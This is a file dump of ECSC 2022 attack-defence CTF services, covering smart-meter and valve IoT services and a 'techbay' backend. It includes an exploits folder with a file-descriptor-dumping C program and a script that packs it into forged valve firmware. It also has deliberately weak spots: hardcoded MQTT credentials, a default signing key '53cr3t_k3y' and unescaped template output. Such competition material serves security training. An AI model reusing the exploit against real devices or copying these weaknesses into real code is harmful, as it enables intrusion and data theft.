commander.key / 11 | RUN chmod +x /checker/checker.py 12 | USER ctf-checkermaster 13 | ENV CTF_CHECKERSCRIPT /checker/checker.py 14 | ENV PYTHONUNBUFFERED=1 15 | WORKDIR /checker 16 | 17 | # set this to _checker 18 | ENV CTF_SERVICE hps_checker2 19 | -------------------------------------------------------------------------------- /hps/checkers/checker2/docker-compose.yml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | services: 4 | checker: 5 | build: . 6 | command: localhost 1 ${TICK} # ip, team, tick 7 | network_mode: host 8 | volumes: 9 | - tmpstore:/tmp 10 | 11 | volumes: 12 | tmpstore: 13 | -------------------------------------------------------------------------------- /hps/checkers/checker2/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | paho-mqtt 3 | tlv8 4 | pycryptodome==3.15.0 -------------------------------------------------------------------------------- /hps/dist/README.md: -------------------------------------------------------------------------------- 1 | # HPS 2 | 3 | ## Flag IDs 4 | 5 | The service has 2 flag stores and does not use flag IDs. 6 | -------------------------------------------------------------------------------- /hps/dist/mqtt/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM eclipse-mosquitto 2 | 3 | COPY mosquitto.conf /mosquitto/config/mosquitto.conf 4 | COPY acls.txt /mosquitto/config/acls.txt 5 | COPY pw.file /mosquitto/config/pw.file 6 | COPY certs /mosquitto/config/certs -------------------------------------------------------------------------------- /hps/dist/mqtt/acls.txt: -------------------------------------------------------------------------------- 1 | # allow read for valve to topic valve/commands 2 | 3 | user valve 4 | topic read valve/commands 5 | topic write valve/status 6 | 7 | # allow read write for everything for commander 8 | user commander 9 | topic readwrite # 10 | 11 | # allow read for smartmeter to topic smartmeter/commands 12 | user smartmeter 13 | topic read smartmeter/commands 14 | topic write smartmeter/status -------------------------------------------------------------------------------- /hps/dist/mqtt/mosquitto.conf: -------------------------------------------------------------------------------- 1 | per_listener_settings true 2 | 3 | 4 | listener 10035 5 | protocol mqtt 6 | allow_anonymous false 7 | acl_file /mosquitto/config/acls.txt 8 | password_file /mosquitto/config/pw.file 9 | 10 | 11 | listener 10036 12 | protocol mqtt 13 | cafile /mosquitto/config/certs/ca.crt 14 | certfile /mosquitto/config/certs/server.crt 15 | keyfile /mosquitto/config/certs/server.key 16 | allow_anonymous false 17 | acl_file /mosquitto/config/acls.txt 18 | require_certificate true 19 | use_identity_as_username true -------------------------------------------------------------------------------- /hps/dist/mqtt/pw.file: -------------------------------------------------------------------------------- 1 | # NwdZbbqefnKgXfk7dLmP5LfM 2 | valve:$7$101$UrBtF87Y0LmC/UVz$3Vg0fTmT8UPU9gFFJ7kYbLQ2xYxVxSstBm3NcoeYBRFD5Ow/NtpIR/uN7TUA4hGiaoileo9udsJBCaD20jAcNg== 3 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10-slim-buster 2 | 3 | COPY requirements.txt /requirements.txt 4 | 5 | RUN pip install -r /requirements.txt 6 | 7 | COPY . /app 8 | 9 | WORKDIR /app 10 | 11 | ENV PYTHONUNBUFFERED=1 12 | RUN mkdir /data && chown -R 1000:1000 /data 13 | RUN useradd -ms /bin/bash user 14 | USER user 15 | 16 | CMD ["bash", "-c", "python3 manage.py migrate && python3 -u manage.py runserver 0.0.0.0:10030 --noreload"] 17 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/Smartmeter/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/dist/smartmeter/Smartmeter/__init__.py -------------------------------------------------------------------------------- /hps/dist/smartmeter/Smartmeter/asgi.py: -------------------------------------------------------------------------------- 1 | """ 2 | ASGI config for Smartmeter project. 3 | 4 | It exposes the ASGI callable as a module-level variable named ``application``. 5 | 6 | For more information on this file, see 7 | https://docs.djangoproject.com/en/4.1/howto/deployment/asgi/ 8 | """ 9 | 10 | import os 11 | 12 | from django.core.asgi import get_asgi_application 13 | 14 | os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Smartmeter.settings') 15 | 16 | application = get_asgi_application() 17 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/Smartmeter/urls.py: -------------------------------------------------------------------------------- 1 | """Smartmeter URL Configuration 2 | 3 | The `urlpatterns` list routes URLs to views. For more information please see: 4 | https://docs.djangoproject.com/en/4.1/topics/http/urls/ 5 | Examples: 6 | Function views 7 | 1. Add an import: from my_app import views 8 | 2. Add a URL to urlpatterns: path('', views.home, name='home') 9 | Class-based views 10 | 1. Add an import: from other_app.views import Home 11 | 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home') 12 | Including another URLconf 13 | 1. Import the include() function: from django.urls import include, path 14 | 2. Add a URL to urlpatterns: path('blog/', include('blog.urls')) 15 | """ 16 | from django.contrib import admin 17 | from django.urls import path, include 18 | 19 | urlpatterns = [ 20 | path('admin/', admin.site.urls), 21 | path('', include('web.urls')) 22 | ] 23 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/Smartmeter/wsgi.py: -------------------------------------------------------------------------------- 1 | """ 2 | WSGI config for Smartmeter project. 3 | 4 | It exposes the WSGI callable as a module-level variable named ``application``. 5 | 6 | For more information on this file, see 7 | https://docs.djangoproject.com/en/4.1/howto/deployment/wsgi/ 8 | """ 9 | 10 | import os 11 | 12 | from django.core.wsgi import get_wsgi_application 13 | 14 | os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Smartmeter.settings') 15 | 16 | application = get_wsgi_application() 17 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/manage.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | """Django's command-line utility for administrative tasks.""" 3 | import os 4 | import sys 5 | 6 | 7 | def main(): 8 | """Run administrative tasks.""" 9 | os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'Smartmeter.settings') 10 | try: 11 | from django.core.management import execute_from_command_line 12 | except ImportError as exc: 13 | raise ImportError( 14 | "Couldn't import Django. Are you sure it's installed and " 15 | "available on your PYTHONPATH environment variable? Did you " 16 | "forget to activate a virtual environment?" 17 | ) from exc 18 | execute_from_command_line(sys.argv) 19 | 20 | 21 | if __name__ == '__main__': 22 | main() 23 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/requirements.txt: -------------------------------------------------------------------------------- 1 | paho-mqtt 2 | whitenoise 3 | svg.charts 4 | matplotlib 5 | numpy 6 | bokeh 7 | django -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/Px437_IBM_EGA8.otf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/dist/smartmeter/static/fonts/Px437_IBM_EGA8.otf -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/arrow-down-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/arrow-down-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/arrow-up-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/arrow-up-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/checkbox-checked-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/checkbox-checked-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/checkbox-unchecked-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/checkbox-unchecked-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/grid-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/grid-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/grid.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/hyphen-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/hyphen-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/left-brace-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/left-brace-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/radio-checked-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/radio-checked-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/radio-unchecked-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/radio-unchecked-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/right-brace-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/right-brace-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/shade-100-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/shade-100-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/shade-25-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/shade-25-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/shade-75-black.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/static/fonts/shade-75-grayLight.svg: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/templates/graph.html: -------------------------------------------------------------------------------- 1 | {% extends '_base.html' %} 2 | 3 | {% block content %} 4 | 7 | 17 |
18 |
19 | 20 |
21 | Rendering failed :( 22 |
23 | {% endblock %} 24 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/templates/graph_html.html: -------------------------------------------------------------------------------- 1 | {% extends '_base.html' %} 2 | 3 | {% block content %} 4 | {% if messages %} 5 | {% for message in messages %} 6 |
7 | 8 |
9 | {% endfor %} 10 | {% endif %} 11 |
12 | 15 | 16 |
17 | {% endblock %} 18 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/templates/index.html: -------------------------------------------------------------------------------- 1 | {% extends '_base.html' %} 2 | 3 | {% block content %} 4 | 7 | 17 |
18 |
19 | 20 |
21 | {{ text | safe}} 22 |
23 | {% endblock %} 24 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/templates/warnings.html: -------------------------------------------------------------------------------- 1 | {% if messages %} 2 | {% for message in messages %} 3 |
4 | 5 |
6 | {% endfor %} 7 | {% endif %} -------------------------------------------------------------------------------- /hps/dist/smartmeter/web/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/dist/smartmeter/web/__init__.py -------------------------------------------------------------------------------- /hps/dist/smartmeter/web/admin.py: -------------------------------------------------------------------------------- 1 | from django.contrib import admin 2 | 3 | # Register your models here. 4 | -------------------------------------------------------------------------------- /hps/dist/smartmeter/web/migrations/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/dist/smartmeter/web/migrations/__init__.py -------------------------------------------------------------------------------- /hps/dist/smartmeter/web/tests.py: -------------------------------------------------------------------------------- 1 | from django.test import TestCase 2 | 3 | # Create your tests here. 4 | -------------------------------------------------------------------------------- /hps/dist/valve/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM python:3.10-slim-buster 2 | 3 | COPY requirements.txt /requirements.txt 4 | 5 | RUN pip install -r /requirements.txt 6 | 7 | RUN apt-get update && apt-get install -y zip libcap2-bin rsync 8 | 9 | COPY . /app 10 | 11 | WORKDIR /app 12 | ENV PYTHONUNBUFFERED=1 13 | 14 | CMD ["bash", "entry.sh"] -------------------------------------------------------------------------------- /hps/dist/valve/commands.log: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/dist/valve/commands.log -------------------------------------------------------------------------------- /hps/dist/valve/entry.sh: -------------------------------------------------------------------------------- 1 | while true 2 | do 3 | python app.py 4 | done -------------------------------------------------------------------------------- /hps/dist/valve/pcaps/debug.pcapng: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/dist/valve/pcaps/debug.pcapng -------------------------------------------------------------------------------- /hps/dist/valve/public.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvZmySkRUrJyvv/xQ9NeG 3 | e3EGPqPVX4EHVn5VES2CKObAi8GLzD/rfWEskYKBVri+sCBNvoaa0l3TNOzUd3Gz 4 | HEKGgawDbVs4OautDDMBsoF3b2nh2msXzW2TF9s2DQH/sWAbznbOqgDbkAwqpa8S 5 | xPWT+P1ABVCJ1nJ1scNpXnY2b6+U+vxt6ouuviuGDMbvkmxsOzNxv77XFNVnnV1O 6 | yC79hA4JMAr2c5L8O1AgR8Xixx21TTynsJi+xrAx3AVgl5Vc3tdOIB20+/9xPZo3 7 | FBrO2mmEsypcXAf/dW2uFbzvL0WIY6UdDLyVOwsK3KaUtFppZROgsNN65wFNc/e5 8 | vwIDAQAB 9 | -----END PUBLIC KEY----- -------------------------------------------------------------------------------- /hps/dist/valve/requirements.txt: -------------------------------------------------------------------------------- 1 | click==8.1.3 2 | Flask==2.2.2 3 | itsdangerous==2.1.2 4 | Jinja2==3.1.2 5 | MarkupSafe==2.1.1 6 | tlv8==0.10.0 7 | Werkzeug==2.2.2 8 | pycryptodome==3.15.0 9 | paho-mqtt -------------------------------------------------------------------------------- /hps/dist/valve/settings.py: -------------------------------------------------------------------------------- 1 | 2 | ENABLE_PCAP = False 3 | 4 | MQTT_PASSWORD = "NwdZbbqefnKgXfk7dLmP5LfM" -------------------------------------------------------------------------------- /hps/dist/valve/static/logo.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/dist/valve/static/logo.png -------------------------------------------------------------------------------- /hps/dist/valve/templates/debug.html: -------------------------------------------------------------------------------- 1 | {% extends "_base.html" %} 2 | {% block title %}WFC - Index{% endblock %} 3 | {% block content %} 4 |

Create pcap:

5 | {% endblock %} -------------------------------------------------------------------------------- /hps/dist/valve/templates/firmware_upgrade.html: -------------------------------------------------------------------------------- 1 | {% extends "_base.html" %} 2 | {% block title %}WFC - Index{% endblock %} 3 | {% block content %} 4 |
5 | 6 | 7 | 8 |
9 | {% endblock %} -------------------------------------------------------------------------------- /hps/dist/valve/templates/logs.html: -------------------------------------------------------------------------------- 1 | {% extends "_base.html" %} 2 | {% block title %}WFC - Index{% endblock %} 3 | {% block content %} 4 | 
5 | {{ logs }}
6 |
7 | {% endblock %} -------------------------------------------------------------------------------- /hps/dist/valve/version.py: -------------------------------------------------------------------------------- 1 | VERSION=0.11 2 | HASH="1234567890abcdef1234567890abcdef" -------------------------------------------------------------------------------- /hps/exploits/ECSC_valve_firmware_gen/a.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | #include 4 | 5 | int main( int argc, char *argv[] ) { 6 | 7 | char buf[50000]; 8 | int fd=0; 9 | for (fd = 3; fd < 110; ++fd){ 10 | read( fd, buf, 50000 ); 11 | printf("fd %d: %s", fd, buf); 12 | } 13 | printf("\n"); 14 | } 15 | -------------------------------------------------------------------------------- /hps/exploits/ECSC_valve_firmware_gen/a.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/exploits/ECSC_valve_firmware_gen/a.out -------------------------------------------------------------------------------- /hps/exploits/ECSC_valve_firmware_gen/b.out: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/exploits/ECSC_valve_firmware_gen/b.out -------------------------------------------------------------------------------- /hps/exploits/ECSC_valve_firmware_gen/firmware_generator.py: -------------------------------------------------------------------------------- 1 | from firmware_utils import * 2 | 3 | extractor = b""" 4 | #!/bin/bash 5 | echo "Extracting firmware..." 6 | unzip data.zip -d target 7 | cd target 8 | find . -type f -exec sha256sum {} \; | sha256sum 9 | """ 10 | 11 | data = open("test_data.zip", "rb").read() 12 | inner_hash = b"d62f1effc7ea8c890f60d9bc37dc5c6b5ade7487b333465c654ced0a25851390" 13 | target = open("test.bin", "wb") 14 | 15 | 16 | packed = pack(extractor, data, inner_hash) 17 | target.write(packed) 18 | target.close() -------------------------------------------------------------------------------- /hps/exploits/ECSC_valve_firmware_gen/firmware_generator_exploit.py: -------------------------------------------------------------------------------- 1 | import tlv8 2 | 3 | from firmware_utils import * 4 | 5 | extractor = open("a.out", "rb").read() 6 | orig_firmware = open("test.bin", "rb").read() 7 | data = open("test_data2.zip", "rb").read() 8 | 9 | decoded = tlv8.decode(orig_firmware, structure).data 10 | decoded[2] = tlv8.Entry(3, extractor) 11 | #decoded[5] = tlv8.Entry(6, data) 12 | target = open("test_exploit.bin", "wb") 13 | 14 | target.write(tlv8.encode(decoded)) 15 | target.close() -------------------------------------------------------------------------------- /hps/exploits/ECSC_valve_firmware_gen/public.pem: -------------------------------------------------------------------------------- 1 | -----BEGIN PUBLIC KEY----- 2 | MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAvZmySkRUrJyvv/xQ9NeG 3 | e3EGPqPVX4EHVn5VES2CKObAi8GLzD/rfWEskYKBVri+sCBNvoaa0l3TNOzUd3Gz 4 | HEKGgawDbVs4OautDDMBsoF3b2nh2msXzW2TF9s2DQH/sWAbznbOqgDbkAwqpa8S 5 | xPWT+P1ABVCJ1nJ1scNpXnY2b6+U+vxt6ouuviuGDMbvkmxsOzNxv77XFNVnnV1O 6 | yC79hA4JMAr2c5L8O1AgR8Xixx21TTynsJi+xrAx3AVgl5Vc3tdOIB20+/9xPZo3 7 | FBrO2mmEsypcXAf/dW2uFbzvL0WIY6UdDLyVOwsK3KaUtFppZROgsNN65wFNc/e5 8 | vwIDAQAB 9 | -----END PUBLIC KEY----- -------------------------------------------------------------------------------- /hps/exploits/ECSC_valve_firmware_gen/requirements.txt: -------------------------------------------------------------------------------- 1 | tlv8==0.10.0 2 | pycryptodome==3.15.0 -------------------------------------------------------------------------------- /hps/exploits/ECSC_valve_firmware_gen/test.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/exploits/ECSC_valve_firmware_gen/test.bin -------------------------------------------------------------------------------- /hps/exploits/ECSC_valve_firmware_gen/test_data.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/exploits/ECSC_valve_firmware_gen/test_data.zip -------------------------------------------------------------------------------- /hps/exploits/ECSC_valve_firmware_gen/test_data2.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/exploits/ECSC_valve_firmware_gen/test_data2.zip -------------------------------------------------------------------------------- /hps/exploits/ECSC_valve_firmware_gen/test_exploit.bin: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/exploits/ECSC_valve_firmware_gen/test_exploit.bin -------------------------------------------------------------------------------- /hps/exploits/ECSC_valve_firmware_gen/version.py: -------------------------------------------------------------------------------- 1 | VERSION=0.13 -------------------------------------------------------------------------------- /hps/hps.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/hps/hps.png -------------------------------------------------------------------------------- /hps/meta.env: -------------------------------------------------------------------------------- 1 | SERVICE_NAME=hps 2 | -------------------------------------------------------------------------------- /techbay/backend-rust_code/.gitignore: -------------------------------------------------------------------------------- 1 | # Generated by Cargo 2 | # will have compiled files and executables 3 | /target/ 4 | 5 | # Remove Cargo.lock from gitignore if creating an executable, leave it for libraries 6 | # More information here https://doc.rust-lang.org/cargo/guide/cargo-toml-vs-cargo-lock.html 7 | Cargo.lock 8 | 9 | # These are backup files generated by rustfmt 10 | **/*.rs.bk -------------------------------------------------------------------------------- /techbay/backend-rust_code/src/models.rs: -------------------------------------------------------------------------------- 1 | pub mod users; 2 | -------------------------------------------------------------------------------- /techbay/backend-rust_code/src/schema.rs: -------------------------------------------------------------------------------- 1 | table! { 2 | profiles (id) { 3 | id -> Nullable, 4 | username -> Text, 5 | password -> Text, 6 | displayname -> Text, 7 | address -> Nullable, 8 | is_address_public -> Bool, 9 | telephone_number -> Nullable, 10 | is_telephone_number_public -> Bool, 11 | status -> Nullable, 12 | is_status_public -> Bool, 13 | } 14 | } 15 | 16 | allow_tables_to_appear_in_same_query!( 17 | profiles, 18 | ); 19 | -------------------------------------------------------------------------------- /techbay/build_backend-rust.sh: -------------------------------------------------------------------------------- 1 | #!/bin/bash 2 | 3 | cd backend-rust_code 4 | cargo build --release 5 | cd .. 6 | cp backend-rust_code/target/release/backend-rust dist/backend-rust/backend-rust 7 | -------------------------------------------------------------------------------- /techbay/checkers/checker1/.gitignore: -------------------------------------------------------------------------------- 1 | .idea 2 | -------------------------------------------------------------------------------- /techbay/checkers/checker1/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN mkdir -p /checker 4 | WORKDIR /checker 5 | 6 | COPY requirements.txt /checker/requirements.txt 7 | RUN pip install -r requirements.txt 8 | 9 | COPY checker.py /checker/checker.py 10 | COPY Gidole-Regular.ttf /checker/Gidole-Regular.ttf 11 | COPY Inconsolata-Regular.ttf /checker/Inconsolata-Regular.ttf 12 | USER ctf-checkermaster 13 | ENV CTF_CHECKERSCRIPT /checker/checker.py 14 | 15 | # set this to _checker 16 | ENV CTF_SERVICE techbay_checker1 17 | -------------------------------------------------------------------------------- /techbay/checkers/checker1/Gidole-Regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/techbay/checkers/checker1/Gidole-Regular.ttf -------------------------------------------------------------------------------- /techbay/checkers/checker1/Inconsolata-Regular.ttf: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ECSC2022/ctf-services/993a08432bcec4d6d2a62ae5741ffd9568dd239a/techbay/checkers/checker1/Inconsolata-Regular.ttf -------------------------------------------------------------------------------- /techbay/checkers/checker1/README.md: -------------------------------------------------------------------------------- 1 | ### Building and running the checker 2 | 3 | Run the application (from `/dist`) 4 | ``` 5 | docker-compose up 6 | ``` 7 | 8 | Run the checker for one tick (from `/checker/checker1`) 9 | ``` 10 | TICK=0 docker-compose up 11 | ``` 12 | 13 | This will do the following: 14 | 15 | - call place_flag for the current tick 16 | - call check_service 17 | - call check_flag for up to 5 previous ticks (one invocation per tick) 18 | 19 | To test that checking previous ticks works, call the checker with increasing tick numbers: 20 | ``` 21 | TICK=1 docker-compose up # checked ticks: 0, 1 22 | TICK=2 docker-compose up # checked ticks: 0, 1, 2 23 | TICK=3 docker-compose up # checked ticks: 0, 1, 2, 3 24 | TICK=4 docker-compose up # checked ticks: 0, 1, 2, 3, 4 25 | TICK=5 docker-compose up # checked ticks: 0, 1, 2, 3, 4, 5 26 | TICK=6 docker-compose up # checked ticks: 1, 2, 3, 4, 5, 6 27 | ... 28 | ``` 29 | -------------------------------------------------------------------------------- /techbay/checkers/checker1/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | 4 | services: 5 | checker: 6 | build: . 7 | command: localhost 1 ${TICK} 8 | network_mode: host 9 | -------------------------------------------------------------------------------- /techbay/checkers/checker1/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | Pillow -------------------------------------------------------------------------------- /techbay/checkers/checker2/.gitignore: -------------------------------------------------------------------------------- 1 | .idea 2 | -------------------------------------------------------------------------------- /techbay/checkers/checker2/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM wert310/gameserver-basechecker:ef3af01 2 | 3 | RUN mkdir -p /checker 4 | WORKDIR /checker 5 | 6 | COPY requirements.txt /checker/requirements.txt 7 | RUN pip install -r requirements.txt 8 | 9 | COPY checker.py /checker/checker.py 10 | USER ctf-checkermaster 11 | ENV CTF_CHECKERSCRIPT /checker/checker.py 12 | 13 | # set this to _checker 14 | ENV CTF_SERVICE techbay_checker2 15 | -------------------------------------------------------------------------------- /techbay/checkers/checker2/README.md: -------------------------------------------------------------------------------- 1 | ### Building and running the checker 2 | 3 | Run the application (from `/dist`) 4 | ``` 5 | docker-compose up 6 | ``` 7 | 8 | Run the checker for one tick (from `/checker/checker1`) 9 | ``` 10 | TICK=0 docker-compose up 11 | ``` 12 | 13 | This will do the following: 14 | 15 | - call place_flag for the current tick 16 | - call check_service 17 | - call check_flag for up to 5 previous ticks (one invocation per tick) 18 | 19 | To test that checking previous ticks works, call the checker with increasing tick numbers: 20 | ``` 21 | TICK=1 docker-compose up # checked ticks: 0, 1 22 | TICK=2 docker-compose up # checked ticks: 0, 1, 2 23 | TICK=3 docker-compose up # checked ticks: 0, 1, 2, 3 24 | TICK=4 docker-compose up # checked ticks: 0, 1, 2, 3, 4 25 | TICK=5 docker-compose up # checked ticks: 0, 1, 2, 3, 4, 5 26 | TICK=6 docker-compose up # checked ticks: 1, 2, 3, 4, 5, 6 27 | ... 28 | ``` 29 | -------------------------------------------------------------------------------- /techbay/checkers/checker2/docker-compose.yaml: -------------------------------------------------------------------------------- 1 | version: '3' 2 | 3 | 4 | services: 5 | checker: 6 | build: . 7 | command: localhost 1 ${TICK} 8 | network_mode: host 9 | -------------------------------------------------------------------------------- /techbay/checkers/checker2/requirements.txt: -------------------------------------------------------------------------------- 1 | requests 2 | Pillow -------------------------------------------------------------------------------- /techbay/dist/README.md: -------------------------------------------------------------------------------- 1 | # techbay 2 | 3 | ## Flag IDs 4 | 5 | - Flagstore 1: the flag id correspond to the user id with flags 6 | - Flagstore 2: the flag id correspond to the user id with flags 7 | -------------------------------------------------------------------------------- /techbay/dist/backend-node/.dockerignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | .idea 3 | docker -------------------------------------------------------------------------------- /techbay/dist/backend-node/.gitignore: -------------------------------------------------------------------------------- 1 | node_modules 2 | .idea 3 | build 4 | yarn-error.log -------------------------------------------------------------------------------- /techbay/dist/backend-node/docker/Dockerfile: -------------------------------------------------------------------------------- 1 | FROM node:16 as builder 2 | 3 | WORKDIR /app 4 | 5 | COPY ./package.json . 6 | COPY ./yarn.lock . 7 | 8 | RUN yarn install 9 | 10 | ADD tsconfig.json private.ke[y] ./ 11 | ADD src/ ./src/ 12 | 13 | RUN yarn run build 14 | 15 | FROM node:16 as runner 16 | 17 | WORKDIR /app 18 | 19 | COPY --from=builder /app/node_modules/ ./node_modules/ 20 | COPY --from=builder /app/build/ /app/private.ke[y] ./ 21 | 22 | RUN chown -R node:node /app 23 | 24 | USER node 25 | 26 | ENTRYPOINT ["node", "./index.js"] 27 | 28 | EXPOSE 8080 29 | -------------------------------------------------------------------------------- /techbay/dist/backend-node/src/config.ts: -------------------------------------------------------------------------------- 1 | import * as fs from "fs"; 2 | 3 | export const PRIVATE_KEY = fs.existsSync("private.key") ? fs.readFileSync("private.key", 'utf-8') : '53cr3t_k3y' -------------------------------------------------------------------------------- /techbay/dist/backend-node/src/db/index.ts: -------------------------------------------------------------------------------- 1 | import {Client} from "pg"; 2 | 3 | let connected = false; 4 | const client = new Client({ 5 | host: process.env.DB_HOST ?? 'localhost', 6 | port: parseInt(process.env.DB_PORT ?? '5432'), 7 | database: process.env.DB_NAME ?? 'techbay', 8 | user: process.env.DB_USER ?? 'postgres', 9 | password: process.env.DB_PASSWORD ?? 'password', 10 | }); 11 | 12 | export async function getDbConnection() { 13 | if (!connected) { 14 | connected = true; 15 | await client.connect(); 16 | } 17 | return client; 18 | } -------------------------------------------------------------------------------- /techbay/dist/backend-node/src/index.ts: -------------------------------------------------------------------------------- 1 | import express, { Application } from "express"; 2 | import morgan from "morgan"; 3 | import ProfileController from "./controllers/profile.controller"; 4 | import RequestsController from "./controllers/requests.controller"; 5 | import TradingController from "./controllers/trading.controller"; 6 | import cors from "cors"; 7 | 8 | const app: Application = express(); 9 | 10 | app.use(cors()); 11 | 12 | app.use(express.json()); 13 | app.use(morgan("tiny")); 14 | 15 | app.use("/profile", ProfileController); 16 | app.use("/request", RequestsController); 17 | app.use("/offer", TradingController); 18 | 19 | app.listen(8080, () => { 20 | console.log("Server is running on port", 8080); 21 | }); 22 | -------------------------------------------------------------------------------- 